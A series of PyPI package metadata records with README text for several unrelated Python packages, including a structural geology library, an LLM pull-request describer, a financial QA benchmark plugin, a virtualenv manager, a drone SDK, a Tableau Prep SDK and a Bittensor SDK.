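As a flavour of the orientation math such classes encapsulate, here is a plain-Python sketch (illustrative only, not apsg's actual API) converting a lineation's trend/plunge to direction cosines:

```python
import math

def lin_vector(trend_deg: float, plunge_deg: float) -> tuple[float, float, float]:
    """Direction cosines (north, east, down) of a lineation,
    lower-hemisphere convention. Illustrative helper, not apsg's API."""
    t, p = math.radians(trend_deg), math.radians(plunge_deg)
    return (math.cos(p) * math.cos(t),
            math.cos(p) * math.sin(t),
            math.sin(p))

# A lineation plunging 40 degrees toward azimuth 120
n, e, d = lin_vector(120, 40)
```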
> [!IMPORTANT]
> APSG has been significantly refactored from version 1.0 and several changes are
> breaking backward compatibility. The main APSG namespace provides often-used
> classes in lowercase names as aliases to `PascalCase` convention used in
> modules to provide a simplified interface for users. The `PascalCase` names of
> classes use longer and plain English names instead acronyms for better readability.
>
> Check [documentation](https://apsg.readthedocs.org) for more details.
## :hammer_and_wrench: Requirements
You need Python 3.10 or later to run APSG. The package requires [NumPy](https://numpy.org/), [SciPy](https://www.scipy.org/),
[Matplotlib](https://matplotlib.org/), [SQLAlchemy](https://www.sqlalchemy.org/)
and [pandas](https://pandas.pydata.org/).
## :rocket: How to install
It is strongly suggested to install **apsg** into a separate environment. You can create a
Python virtual environment. For Linux and macOS use:
python -m venv .venv
source .venv/bin/activate
for Windows use Command Prompt or PowerShell:
python -m venv .venv
.venv\Scripts\activate
> [!NOTE]
> On Microsoft Windows, it may be required to set the execution policy in PowerShell for the user.
> You can do this by issuing the following PowerShell command:
> ```
> Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
> ```
and install latest stable version of **apsg** using pip within the environment:
pip install apsg
To include jupyterlab and pyqt5 in the installation, use the `extra` option:
pip install apsg[extra]
or install **master** with:
pip install git+https://github.com/ondrolexa/apsg.git
Alternatively, you can clone the repository and do a local install (recommended for dev):
git clone https://github.com/ondrolexa/apsg.git
cd apsg
pip install -e .[dev]
#### Upgrading via pip
To upgrade an existing version of APSG from PyPI, execute:
pip install apsg --upgrade --no-deps
#### Comments on system-wide installations on Debian systems
Recent Debian-based systems do not allow non-Debian packages to be installed system-wide.
However, installing all requirements via apt first lets you force-install APSG system-wide without trouble.
Install requirements using apt:
sudo apt install python3-numpy python3-matplotlib python3-scipy python3-sqlalchemy python3-pandas
and then install apsg using pip:
pip install --break-system-packages apsg
### I'm using conda or mamba to manage environments
If you already have conda or mamba installed, you can create an environment with:
conda config --add channels conda-forge
conda create -n apsg python apsg jupyterlab pyqt
or using mamba
mamba create -n apsg python apsg jupyterlab pyqt
#### Current release info
| Name | Downloads | Version | Platforms |
| --- | --- | --- | --- |
| [](https://anaconda.org/conda-forge/apsg) | [](https://anaconda.org/conda-forge/apsg) | [](https://anaconda.org/conda-forge/apsg) | [](https://anaconda.org/conda-forge/apsg) |
## :blue_book: Documentation
Explore all the features of APSG. You can find detailed documentation [here](https://apsg.readthedocs.org).
## :computer: Contributing
Most discussion happens on [Github](https://github.com/ondrolexa/apsg). Feel free to open [an issue](https://github.com/ondrolexa/apsg/issues/new) or comment on any open issue or pull request. Check ``CONTRIBUTING.md`` for more details.
## :coin: Donate
APSG is an open-source project, available for you for free. It took a lot of time and resources to build this software. If you find it useful and want to support its future development, please consider donating.
[](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=QTYZWVUNDUAH8&item_name=APSG+development+donation¤cy_code=EUR&source=url)
## License
APSG is free software: you can redistribute it and/or modify it under the terms of the MIT License. A copy of this license is provided in ``LICENSE`` file.
| text/markdown | null | Ondrej Lexa <lexa.ondrej@gmail.com> | null | Ondrej Lexa <lexa.ondrej@gmail.com> | null | structural geology, stereonet, orientation data | [
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy",
"matplotlib>=3.9",
"scipy",
"sqlalchemy",
"pandas",
"jupyterlab; extra == \"extra\"",
"pyqt5; extra == \"extra\"",
"pytest; extra == \"tests\"",
"sphinx; extra == \"docs\"",
"sphinx_rtd_theme; extra == \"docs\"",
"readthedocs-sphinx-search; extra == \"docs\"",
"ipykernel; extra == \"docs\"",
"nbsphinx; extra == \"docs\"",
"autodocsumm; extra == \"docs\"",
"apsg[docs,extra,tests]; extra == \"dev\"",
"black; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/ondrolexa/apsg",
"Documentation, https://apsg.readthedocs.io",
"Repository, https://github.com/ondrolexa/apsg.git",
"Issues, https://github.com/ondrolexa/apsg/issues",
"Changelog, https://github.com/ondrolexa/apsg/blob/master/CHANGELOG.md"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:01:16.345707 | apsg-1.4.0.tar.gz | 80,328 | f6/34/6c35ebf96967a7d2a6c7e35a94f603516fcfcb7437368399b3249d50ac2b/apsg-1.4.0.tar.gz | source | sdist | null | false | 06705b835aa0b730f8c804a3bd2c83bf | eedd813ae5e026341dab6ad6a98cfa6ab08b46d944b4e233497d6ddd12c9e4c5 | f6346c35ebf96967a7d2a6c7e35a94f603516fcfcb7437368399b3249d50ac2b | MIT | [
"LICENSE"
] | 230 |
2.4 | goodpr | 0.1.0 | Add your description here | # goodpr
Generate a professional pull request description from a local git repository using LangChain Deep Agents and Gemini.
## Requirements
- Python 3.13+
- [uv](https://docs.astral.sh/uv/)
- A `GOOGLE_API_KEY` for the Gemini API
## Setup
```bash
# Clone and install
uv sync
# Add your Gemini API key
echo GOOGLE_API_KEY=your_key_here > .env
```
## Usage
```bash
uv run goodpr <path/to/repo> --commit-offset <N>
```
| Argument | Description |
|---|---|
| `path/to/repo` | Absolute or relative path to a local git repository |
| `--commit-offset N` | Number of commits back from HEAD to include (default: 5) |
| `--log-file PATH` | Log file path (default: `goodpr.log`) |
**Example** — describe the last 10 commits:
```bash
uv run goodpr C:/projects/myapp --commit-offset 10
```
Output is written to stdout as Markdown, suitable for pasting directly into a GitHub / GitLab PR.
## How it works
```mermaid
flowchart TD
CLI["CLI\nmain.py"]
Git["git format-patch\nHEAD~N..HEAD"]
File["patch_context.txt\nraw patch"]
BuildIndex["build_patch_index()\nchunk by file, BM25"]
Index["BM25 index\nin-memory"]
Main["Main Agent\nGemini 3 Flash"]
SumAgent["summary-agent\nsearch_patch() only"]
ImplAgent["implications-agent\nsearch_patch() only"]
SumOut["TITLE / SUMMARY\nFILES / CHANGE_TYPES"]
ImplOut["BREAKING / MIGRATIONS\nDEPS_CONFIG / TESTING / RISK"]
PR["Final PR\nMarkdown output"]
CLI --> Git
Git --> File
File --> BuildIndex
BuildIndex --> Index
Main -->|"task() STEP 1"| SumAgent
SumAgent -->|"search_patch(query)"| Index
SumAgent --> SumOut
SumOut --> Main
Main -->|"task() STEP 2"| ImplAgent
ImplAgent -->|"search_patch(query)"| Index
ImplAgent --> ImplOut
ImplOut --> Main
Main -->|"STEP 3 compose"| PR
```
### Key design decisions
- **Raw patch on disk** — the full patch is written to `patch_context.txt` (capped at ~500KB from `git format-patch`). Subagents do **not** read this file directly; they only see patch content via search results.
- **BM25 search only** — at startup, the raw patch is chunked per-file-per-commit and indexed with BM25. Subagents use `search_patch(query)` to retrieve relevant chunks (e.g. by file name, function, or keyword) and can analyze the full patch without loading it all at once.
- **File-based handoff** — the patch path is passed in the user message and to `build_pr_agent()` so the BM25 index can be built. After that, all patch access is through the `search_patch` tool, not direct file reads.
- **Structured subagent output** — each subagent returns a fixed labeled format (`TITLE:`, `SUMMARY:`, `BREAKING:`, `RISK:`, etc.) so the main agent can compose the final PR deterministically.
- **Skills** — PR writing guidelines are loaded from `skills/pr/SKILL.md` at runtime.
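The `search_patch(query)` retrieval described above can be sketched from scratch. goodpr itself delegates to the `rank-bm25` package; the chunk texts, tokenization, and parameter values below are illustrative assumptions, not the real index format:

```python
import math

# Hypothetical per-file patch chunks; the real index stores diff text.
chunks = [
    "main.py add argparse flag commit offset",
    "agents.py new summary agent subagent task",
    "search.py build patch index bm25 chunking",
]
docs = [c.split() for c in chunks]
N = len(docs)
avgdl = sum(len(d) for d in docs) / N

def bm25_score(query: str, doc: list[str], k1: float = 1.5, b: float = 0.75) -> float:
    score = 0.0
    for term in query.split():
        df = sum(term in d for d in docs)               # document frequency
        idf = math.log((N - df + 0.5) / (df + 0.5) + 1)
        tf = doc.count(term)                            # term frequency in this chunk
        score += idf * tf * (k1 + 1) / (tf + k1 * (1 - b + b * len(doc) / avgdl))
    return score

def search_patch(query: str) -> str:
    """Return the best-matching chunk, like the subagents' search tool."""
    return max(chunks, key=lambda c: bm25_score(query, c.split()))
```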
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.13 | [] | [] | [] | [
"deepagents>=0.4.1",
"langchain>=1.2.10",
"langchain-community>=0.3.0",
"python-dotenv>=1.0.0",
"rank-bm25>=0.2.2"
] | [] | [] | [] | [] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:01:06.401874 | goodpr-0.1.0.tar.gz | 11,110 | 1e/55/7cf1cc4b0634a3477ce7cd1cf071ec6e641abf3090620917c83586dbf4c3/goodpr-0.1.0.tar.gz | source | sdist | null | false | 129b543f24e47bdbfd1324665d2d789d | 783383e8b51223736e6a2586aa837aa09f619e8f8163471679eeca7bed41a35f | 1e557cf1cc4b0634a3477ce7cd1cf071ec6e641abf3090620917c83586dbf4c3 | null | [] | 221 |
2.4 | jfinqa-helm | 0.1.0 | HELM plugin for JFinQA: Japanese Financial Numerical Reasoning QA Benchmark | # jfinqa-helm
HELM plugin for [JFinQA](https://github.com/ajtgjmdjp/jfinqa): Japanese Financial Numerical Reasoning QA Benchmark.
## Installation
```bash
pip install crfm-helm jfinqa-helm
```
## Usage
```bash
helm-run --run-entries jfinqa:model=openai/gpt-4o
```
## About JFinQA
JFinQA contains 1,000 questions across three subtasks:
- **numerical_reasoning** (550 questions): Calculate financial ratios, growth rates, etc.
- **consistency_checking** (200 questions): Verify whether a statement is consistent with financial data
- **temporal_reasoning** (250 questions): Reason about changes over multiple fiscal years
Questions are drawn from 68 companies' EDINET filings covering J-GAAP, IFRS, and US-GAAP.
**Dataset**: [ajtgjmdjp/jfinqa](https://huggingface.co/datasets/ajtgjmdjp/jfinqa)
## License
Apache-2.0
| text/markdown | ajtgjmdjp | null | null | null | Apache-2.0 | benchmark, finance, helm, japanese, nlp | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"crfm-helm>=0.5.0",
"datasets>=2.0"
] | [] | [] | [] | [
"Homepage, https://github.com/ajtgjmdjp/jfinqa",
"Dataset, https://huggingface.co/datasets/ajtgjmdjp/jfinqa"
] | uv/0.10.0 {"installer":{"name":"uv","version":"0.10.0","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T08:59:43.018763 | jfinqa_helm-0.1.0.tar.gz | 2,926 | c3/2b/f00d417d87f9e4d274d2558b36bfa4dad853f8cdbb8a83261f2c29705b8e/jfinqa_helm-0.1.0.tar.gz | source | sdist | null | false | 96d178628c7aaec624edd4228987f0f8 | 0b9c8b0110506a58256c9d026167976d78ddb393e62751b8ba9c0ee2aabeb317 | c32bf00d417d87f9e4d274d2558b36bfa4dad853f8cdbb8a83261f2c29705b8e | null | [] | 226 |
2.4 | vocker | 0.6.2 | Docker-like manager for virtualenvs | # vocker
Manager for complete Python environments written with security in mind. Mostly for Windows.
## Why
OK so here's a typical experience. You're working on different Python projects which require incompatible versions of dependencies. For example, one of them needs `libfoo==1.0.0` and the other needs `libfoo>3.0.0`. There's just no way to satisfy both. Python people encourage you to create different virtualenvs ("venvs") for different purposes. Sometimes a user reports a bug that they experience with some very specific version of a dependency, so you need to create yet another venv just to investigate that.
Here's a problem: every venv you install takes up a few hundred megabytes of disk space, and a lot of it is for completely redundant files. You were conned into buying an overpriced non-modular computer, so your tiny non-upgradeable SSD is now filled with many copies of the same files. You regret your life choices. Wouldn't it be nice if the duplicate files across different venvs didn't take up any additional space?
Users often report bugs against very specific versions of your software, and the café you work at has pretty slow WiFi. Installing hundreds of megabytes of the same packages over and over quickly grows tiresome. Wouldn't it be nice if you could just copy an existing venv and just tweak it a bit, for example replace the few packages that are actually different?
Finally, some of your nontechnical users refuse to compile and install their own software, but they do want to sometimes have multiple versions installed for testing purposes. However, they also bought non-upgradeable hardware so they don't want multiple copies of the same files that are identical across different versions of the software. Wouldn't it be nice if installing a new venv somehow recycled the existing files from the currently-installed venvs?
Some of your users are paranoid about security. Wouldn't it be nice if the software integrity of the venv-based software package were guaranteed through hashing and Merkle trees?
That's why.
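For a concrete picture of that last point, here is a minimal sketch (under assumed conventions, not vocker's actual scheme) of a Merkle root over a venv's file contents: identical environments hash identically, and any single-file change alters the root.

```python
import hashlib

def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def merkle_root(leaves: list[bytes]) -> bytes:
    """Merkle root over file contents; illustrative, not vocker's actual layout."""
    level = [sha256(leaf) for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2:               # duplicate the last node on odd levels
            level.append(level[-1])
        level = [sha256(a + b) for a, b in zip(level[0::2], level[1::2])]
    return level[0]

# Identical venvs yield identical roots; one changed file changes the root.
root = merkle_root([b"lib/foo.py contents", b"lib/bar.py contents"])
```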
## Goals
- Developers can easily create images, and then distribute them to users who use them to run applications. The users don't necessarily use vocker directly to create containers, they may use some extra layer on top of it (like an installer that provides a GUI and maybe digital signature verification).
- Developers can easily create images from existing images by tweaking whatever needs to be different. For example, installing new software or modifying files.
- Image creation should be reproducible. That is, creating a Python environment and then turning it into an image should give you exactly the same image if you do that a second time. The resulting image hash should be identical.
- Developers can easily audit existing images by just rebuilding them from scratch and checking whether the final result is the same.
## Non-goals
- Digital signature verification.
| text/markdown | null | Eduard Christian Dumitrescu <eduard.c.dumitrescu@gmail.com> | null | null | General Public License v3 | null | [] | [] | null | null | null | [] | [] | [] | [
"atomicwrites",
"attrs",
"boltons",
"cached_property",
"filelock",
"immutabledict",
"marshmallow",
"platformdirs",
"sansio_tools>=1",
"sqlalchemy_boltons>=5",
"SQLAlchemy",
"structlog",
"cbor2",
"pyzstd; extra == \"zstandard\"",
"pytest; extra == \"tests\""
] | [] | [] | [] | [
"Homepage, https://hydra.ecd.space/ecd/vocker/",
"Changelog, https://hydra.ecd.space/ecd/vocker/file?name=CHANGELOG.md&ci=trunk"
] | twine/6.1.0 CPython/3.13.5 | 2026-02-20T08:59:12.442280 | vocker-0.6.2.tar.gz | 75,985 | 5c/17/a8c5ac81ef126cdc3821ba7d3399e02cb0641c7327066ae39ad8b504ae5a/vocker-0.6.2.tar.gz | source | sdist | null | false | 35f3cca750f1dbc11cbc000be91542cc | 038f5617973375adaaea4e428cd3fde807d4290f149cb36d820dc711b4dcac3a | 5c17a8c5ac81ef126cdc3821ba7d3399e02cb0641c7327066ae39ad8b504ae5a | null | [] | 214 |
2.4 | pmini_sdk | 2.0.1 | Python SDK for Pmini quadcopter | # Pmini SDK Python
## Get started
```bash
python -m venv venv
```
```bash
source venv/bin/activate
```
```bash
poetry build
```
```bash
pip install ./dist/pmini-0.0.0-py3-none-any.whl --force-reinstall
```
## Examples
After installing the package, go to the examples folder and run any of the examples:
```bash
cd examples
```
Run example
```bash
python3 takeoff.py
```
# Integration Tests for Pmini SDK
This directory contains integration tests for the Pmini SDK Python library.
## Test Structure
- `conftest.py` - Pytest configuration and fixtures
- `test_basic.py` - Basic tests that don't require simulation
- `test_connection.py` - Connection tests that require simulation
- `run_integration_tests.py` - Test runner script
## Prerequisites
1. Install dependencies:
```bash
pip install pytest pytest-cov
```
2. Install the SDK:
```bash
pip install -e .
```
## Running Tests
### Note
For integration testing, an autopilot simulation is required.
You can use this repository to start the simulation: https://gitlab.com/regislab/pathfindermini/pf_mini_gazebo
```bash
git clone git@gitlab.com:regislab/pathfindermini/pf_mini_gazebo.git && cd pf_mini_gazebo
```
Launch the simulation with the following command
```bash
make run
```
### Basic Tests (No Simulation Required)
```bash
# Run basic tests only
python -m pytest test/test_basic.py -v
# Or use the test runner
python test/run_integration_tests.py --test-path test/test_basic.py
```
### Connection Tests (Requires Simulation)
```bash
# Start your simulation container first, then:
python -m pytest test/test_connection.py -v
```
### All Tests
```bash
# Run all tests
python -m pytest test/ -v
```
### With Markers
```bash
# Run only integration tests
python -m pytest test/ -m integration
# Run only connection tests
python -m pytest test/ -m connection
# Exclude slow tests
python -m pytest test/ -m "not slow"
```
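Custom marks like `integration`, `connection`, and `slow` must be registered with pytest, or runs emit unknown-mark warnings. A plausible registration (an assumption; check the project's actual `pytest.ini` or `pyproject.toml`):

```ini
# pytest.ini (illustrative)
[pytest]
markers =
    integration: integration tests (may require the SDK installed)
    connection: tests that need a running simulation
    slow: long-running tests
```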
## Test Configuration
The tests are configured to connect to a simulation running on:
- Host: `192.168.4.1`
- Port: `8080`
- Protocol: `UDP`
You can modify the connection settings in `conftest.py` if your simulation uses different parameters.
## Test Categories
### Basic Tests (`test_basic.py`)
- SDK import verification
- Configuration object creation
- Enum availability
- Logging setup
### Connection Tests (`test_connection.py`)
- Connection establishment
- Connection stability
- MAVLink client functionality
- Optical flow data availability
- Connection timeout handling
- Connection recovery
## Adding New Tests
1. Create a new test file: `test_<feature>.py`
2. Use the existing fixtures from `conftest.py`
3. Add appropriate markers to your tests
4. Follow the existing test patterns
Example:
```python
import logging

import pytest


class TestNewFeature:
    @pytest.mark.integration
    def test_new_feature(self, pmini_instance, wait_for_connection):
        logger = logging.getLogger(__name__)
        logger.info("Testing new feature")
        # Your test logic here
        assert True
        logger.info("✅ New feature test passed")
```
## Troubleshooting
### Connection Timeout
If tests fail with connection timeout:
1. Ensure your simulation container is running
2. Check that the simulation is listening on the correct port
3. Verify network connectivity between test environment and simulation
### Import Errors
If you get import errors:
1. Make sure the SDK is installed: `pip install -e .`
2. Check that all dependencies are installed: `pip install -r requirements.txt`
### Test Failures
- Check the logs for detailed error messages
- Use `-v` flag for verbose output
- Use `-s` flag to see print statements
| text/markdown | RegisLab | null | null | null | Proprietary | drone, quadcopter, zenoh, sdk | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: Other/Proprietary License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Scientific/Engineering",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | <4.0,>=3.9 | [] | [] | [] | [
"dash==2.17.1",
"eclipse-zenoh<1.8,>=1.7",
"plotly==5.22.0"
] | [] | [] | [] | [
"Homepage, https://github.com/RegisLab/pmini-sdk",
"Repository, https://github.com/RegisLab/pmini-sdk"
] | poetry/2.3.2 CPython/3.12.12 Linux/6.17.0-14-generic | 2026-02-20T08:58:55.212724 | pmini_sdk-2.0.1-py3-none-any.whl | 26,412 | 50/55/6bbbd8a911b9ef4c402a46f74c5c2ae50f71aaa10ee97d5c00d418cfc515/pmini_sdk-2.0.1-py3-none-any.whl | py3 | bdist_wheel | null | false | 184f0957ea1b901e59039d0aad802ff7 | ec7466773fc00282b6ec7235a3dc6cf0b9c9e3828a889ef75306c27506fd5f0b | 50556bbbd8a911b9ef4c402a46f74c5c2ae50f71aaa10ee97d5c00d418cfc515 | null | [] | 0 |
2.3 | cwprep | 0.3.0 | Tableau Prep Flow SDK - Programmatically generate .tfl files | # cwprep - Tableau Prep Flow SDK
A Python SDK for programmatically generating Tableau Prep data flow (.tfl) files. Built through reverse-engineering the TFL JSON structure, enabling flow creation and modification via code without opening the GUI.
## Installation
```bash
pip install cwprep
```
## Quick Start
```python
from cwprep import TFLBuilder, TFLPackager

# Create builder
builder = TFLBuilder(flow_name="My Flow")

# Add database connection
conn_id = builder.add_connection(
    host="localhost",
    username="root",
    dbname="mydb",
)

# Add input tables
orders = builder.add_input_table("orders", "orders", conn_id)
customers = builder.add_input_table("customers", "customers", conn_id)

# Join tables
joined = builder.add_join(
    name="Orders + Customers",
    left_id=orders,
    right_id=customers,
    left_col="customer_id",
    right_col="customer_id",
    join_type="left",
)

# Add output
builder.add_output_server("Output", joined, "My_Datasource")

# Build and save
flow, display, meta = builder.build()
TFLPackager.save_to_folder("./output", flow, display, meta)
TFLPackager.pack_zip("./output", "./my_flow.tfl")
```
## Features
| Feature | Method | Description |
|---------|--------|-------------|
| Database Connection | `add_connection()` | Connect to MySQL/PostgreSQL/Oracle |
| SQL Input | `add_input_sql()` | Custom SQL query input |
| Table Input | `add_input_table()` | Direct table connection |
| Join | `add_join()` | left/right/inner/full joins |
| Union | `add_union()` | Merge multiple tables |
| Filter | `add_filter()` | Expression-based filter |
| Value Filter | `add_value_filter()` | Keep/exclude by values |
| Keep Only | `add_keep_only()` | Select columns |
| Remove Columns | `add_remove_columns()` | Drop columns |
| Rename | `add_rename()` | Rename columns |
| Calculation | `add_calculation()` | Tableau formula fields |
| Quick Calc | `add_quick_calc()` | Quick clean (lowercase/uppercase/trim/remove) |
| Change Type | `add_change_type()` | Change column data types |
| Duplicate Column | `add_duplicate_column()` | Duplicate (copy) a column |
| Aggregate | `add_aggregate()` | GROUP BY with SUM/AVG/COUNT |
| Pivot | `add_pivot()` | Rows to columns |
| Unpivot | `add_unpivot()` | Columns to rows |
| Output | `add_output_server()` | Publish to Tableau Server |
## Examples
See the `examples/` directory for complete demos:
- `demo_basic.py` - Input, Join, Output
- `demo_cleaning.py` - Filter, Calculate, Rename
- `demo_aggregation.py` - Union, Aggregate, Pivot
- `demo_comprehensive.py` - All features combined
## MCP Server
cwprep includes a built-in [Model Context Protocol](https://modelcontextprotocol.io/) server, enabling AI clients (Claude Desktop, Cursor, Gemini CLI, etc.) to generate TFL files directly.
### Prerequisites
| Method | Requirement |
|--------|-------------|
| `uvx` (recommended) | Install [uv](https://docs.astral.sh/uv/getting-started/installation/) — it auto-downloads `cwprep[mcp]` in an isolated env |
| `pip install` | Python ≥ 3.8 + `pip install cwprep[mcp]` |
### Quick Start
```bash
# Local (stdio)
cwprep-mcp
# Remote (Streamable HTTP)
cwprep-mcp --transport streamable-http --port 8000
```
### Client Configuration
All clients below use the **`uvx` method** (recommended). Replace `uvx` with `cwprep-mcp` if you prefer a local `pip install`.
<details>
<summary><b>Claude Desktop</b></summary>
Edit config file:
- **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
- **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
```json
{
"mcpServers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>Cursor</b></summary>
Settings → MCP → Add new MCP server, or edit `~/.cursor/mcp.json`:
```json
{
"mcpServers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>VS Code (Copilot)</b></summary>
Create `.vscode/mcp.json` in project root:
```json
{
"servers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>Windsurf (Codeium)</b></summary>
Edit `~/.codeium/windsurf/mcp_config.json`:
```json
{
"mcpServers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>Claude Code (CLI)</b></summary>
```bash
claude mcp add cwprep -- uvx --from "cwprep[mcp]" cwprep-mcp
```
</details>
<details>
<summary><b>Gemini CLI</b></summary>
Edit `~/.gemini/settings.json`:
```json
{
"mcpServers": {
"cwprep": {
"command": "uvx",
"args": ["--from", "cwprep[mcp]", "cwprep-mcp"]
}
}
}
```
</details>
<details>
<summary><b>Continue (VS Code / JetBrains)</b></summary>
Edit `~/.continue/config.yaml`:
```yaml
mcpServers:
- name: cwprep
command: uvx
args:
- --from
- cwprep[mcp]
- cwprep-mcp
```
</details>
<details>
<summary><b>Remote HTTP Mode (any client)</b></summary>
Start the server:
```bash
cwprep-mcp --transport streamable-http --port 8000
```
Then configure your client with the endpoint: `http://your-server-ip:8000/mcp`
</details>
### Available MCP Capabilities
| Type | Name | Description |
|------|------|-------------|
| 🔧 Tool | `generate_tfl` | Generate .tfl file from flow definition |
| 🔧 Tool | `list_supported_operations` | List all supported node types |
| 🔧 Tool | `validate_flow_definition` | Validate flow definition before generating |
| 📖 Resource | `cwprep://docs/api-reference` | SDK API reference |
| 📖 Resource | `cwprep://docs/calculation-syntax` | Tableau Prep calculation syntax |
| 💬 Prompt | `design_data_flow` | Interactive flow design assistant |
| 💬 Prompt | `explain_tfl_structure` | TFL file structure explanation |
## AI Skill Support
This project includes a specialized AI Skill for assistants like Claude or Gemini to help you build flows.
- **Location**: `.agents/skills/tfl-generator/`
- **Features**: Procedural guidance for flow construction, API reference, and Tableau Prep calculation syntax rules.
## Directory Structure
```
cwprep/
├── .agents/skills/ # AI Agent skills and technical references
├── src/cwprep/ # SDK source code
│ ├── builder.py # TFLBuilder class
│ ├── packager.py # TFLPackager class
│ ├── config.py # Configuration utilities
│ └── mcp_server.py # MCP Server (Tools, Resources, Prompts)
├── examples/ # Demo scripts
├── docs/ # Documentation
└── tests/ # Unit tests
```
## Configuration
Create `config.yaml` for default settings:
```yaml
database:
host: localhost
username: root
dbname: mydb
port: "3306"
db_class: mysql
tableau_server:
url: http://your-server
project_name: Default
```
## Changelog
See [changelog.md](changelog.md) for version history.
## License
MIT License
| text/markdown | cooper wenhua | null | null | null | MIT | data-engineering, data-pipeline, etl, tableau, tableau-prep, tfl | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Database",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"cffi<2.0.0,>=1.0.0; extra == \"all\"",
"mcp<2,>=1.25; extra == \"all\"",
"python-dotenv>=1.0; extra == \"all\"",
"pyyaml>=6.0; extra == \"all\"",
"build>=1.0; extra == \"dev\"",
"cffi<2.0.0,>=1.0.0; extra == \"dev\"",
"mcp<2,>=1.25; extra == \"dev\"",
"pytest>=7.0; extra == \"dev\"",
"python-dotenv>=1.0; extra == \"dev\"",
"pyyaml>=6.0; extra == \"dev\"",
"python-dotenv>=1.0; extra == \"dotenv\"",
"cffi<2.0.0,>=1.0.0; extra == \"mcp\"",
"mcp<2,>=1.25; extra == \"mcp\"",
"pyyaml>=6.0; extra == \"yaml\""
] | [] | [] | [] | [
"Homepage, https://github.com/imgwho/cwprep",
"Documentation, https://github.com/imgwho/cwprep#readme",
"Repository, https://github.com/imgwho/cwprep.git",
"Issues, https://github.com/imgwho/cwprep/issues"
] | twine/6.2.0 CPython/3.13.1 | 2026-02-20T08:58:39.521314 | cwprep-0.3.0.tar.gz | 22,114 | 8e/81/93ccf01ccbfabb1e53fb2fccbc2bfc7b29c6a81e141c029c3c0379c3465e/cwprep-0.3.0.tar.gz | source | sdist | null | false | dad9def828086a64ca298a6ba4abe4fa | d68b94a0dd41a2ec8d84a470d93e79170c5eb207e279d364353997a5447b2e81 | 8e8193ccf01ccbfabb1e53fb2fccbc2bfc7b29c6a81e141c029c3c0379c3465e | null | [] | 228 |
2.4 | turbobt | 1.0.1.dev3 | A next generation Bittensor SDK, for Python 3. | # turbobt
A next generation Bittensor SDK, for Python 3.
# Releasing
Building and deploying to PyPI is done via GitHub Actions. To release a new version:
```
git tag vX.Y.Z
git push origin vX.Y.Z
```
| text/markdown | null | Reef Technologies <opensource@reef.pl> | null | null | null | null | [
"Development Status :: 2 - Pre-Alpha",
"Framework :: AsyncIO",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"bittensor-drand~=1.0.0",
"bittensor-wallet~=4.0.0",
"eciespy~=0.4.6",
"httpx~=0.26.0",
"scalecodec~=1.2.11",
"websockets~=14.1",
"xxhash~=3.5.0"
] | [] | [] | [] | [
"Homepage, https://github.com/bactensor/turbobt",
"Issues, https://github.com/bactensor/turbobt/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T08:58:23.970146 | turbobt-1.0.1.dev3.tar.gz | 136,877 | c9/26/08bf1888897dadbb90448cb9ec367d06c5a97253f1060a597dc754db2007/turbobt-1.0.1.dev3.tar.gz | source | sdist | null | false | 9a2ab1939d2a943f2dc4ff8fd6c306a5 | 22d2af5a77dbbdc401b6475869e45dce8f1eeca6849881d8aeef41c5e1d7773c | c92608bf1888897dadbb90448cb9ec367d06c5a97253f1060a597dc754db2007 | BSD-3-Clause | [
"LICENSE"
] | 169 |
